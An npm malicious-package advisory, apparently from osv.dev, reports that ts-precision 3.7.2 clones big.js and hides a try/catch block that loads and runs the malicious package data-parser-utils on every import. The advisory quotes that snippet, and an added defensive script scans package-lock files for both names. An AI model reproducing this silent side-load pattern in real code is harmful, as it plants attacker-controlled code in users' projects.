npm

ts-precision @3.7.2

Vulnerability report · Last retrieved from osv.dev June 25, 2026 at 10:45 PM UTC

Malicious

OSV ID

MAL-2026-6469

Ecosystem

npm

Summary

Package ships a verbatim copy of big.js v7.0.1 (including the original author metadata 'Michael Mclaughlin <M8ch88l@gmail.com>' and repo reference MikeMcl/big.js) under a different name, mimicking a legitimate arbitrary-precision math library to lure installers. Hidden between math methods in the module body is an unrelated block: try { const doc = require("data-parser-utils"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { }. This block fires on every require('ts-precision') / import of the package, pulling in and invoking the known-malicious npm package data-parser-utils, with errors silently swallowed in an empty try/catch and no-op promise handlers to hide failures from the consumer. The dependency invocation is unrelated to decimal arithmetic and exists solely to side-load attacker-controlled code into any consumer's process at module load.

Source: amazon-inspector (e7d2534408d7dd1d7f02c3ef470bc697d0803e8acd58941de5974a250127cb8c)
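
Because the side-load fires at module load, a project is exposed whenever either package named in the summary is anywhere in its resolved tree, not only when it is a direct dependency. The following added example (not part of the original report or of any project it names) walks a parsed package-lock.json and lists every install path for either name. It assumes any version of either name counts as a hit; the sample lock file and the data-parser-utils version string in it are constructed.

```javascript
// Package names taken from the report. Assumption: every version is flagged,
// since the report lists only ts-precision 3.7.2 and no data-parser-utils version.
const FLAGGED = new Set(["ts-precision", "data-parser-utils"]);
const NM = "node_modules/";

// Lockfile v2/v3: flat "packages" map keyed by install path,
// e.g. "node_modules/a/node_modules/ts-precision".
function scanPackagesMap(packages, hits) {
  for (const [path, meta] of Object.entries(packages)) {
    if (path === "") continue; // root project entry
    const idx = path.lastIndexOf(NM);
    // meta.name is present when the install path differs from the real name (alias).
    const name = meta.name || (idx === -1 ? path : path.slice(idx + NM.length));
    if (FLAGGED.has(name)) hits.push({ name, version: meta.version || "unknown", path });
  }
}

// Lockfile v1: nested "dependencies" tree; recurse and record the chain of parents.
function scanDependencyTree(deps, trail, hits) {
  for (const [name, meta] of Object.entries(deps || {})) {
    const chain = [...trail, name];
    if (FLAGGED.has(name)) {
      hits.push({ name, version: meta.version || "unknown", path: chain.join(" > ") });
    }
    scanDependencyTree(meta.dependencies, chain, hits);
  }
}

// Accepts the parsed JSON of a package-lock.json and returns all hits.
function scanLockfile(lock) {
  const hits = [];
  if (lock.packages) scanPackagesMap(lock.packages, hits); // v2 also carries a v1 tree; skip it
  else scanDependencyTree(lock.dependencies, [], hits);
  return hits;
}

// Constructed sample lock file (not taken from a real project).
const SAMPLE_LOCK = {
  name: "demo-app",
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/big.js": { version: "7.0.1" },
    "node_modules/ts-precision": { version: "3.7.2" },
    "node_modules/ts-precision/node_modules/data-parser-utils": { version: "0.0.0-constructed" },
  },
};

console.log(scanLockfile(SAMPLE_LOCK));
```

To check a real project, pass the result of JSON.parse on the contents of its package-lock.json to scanLockfile and fail the build when the returned array is not empty.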
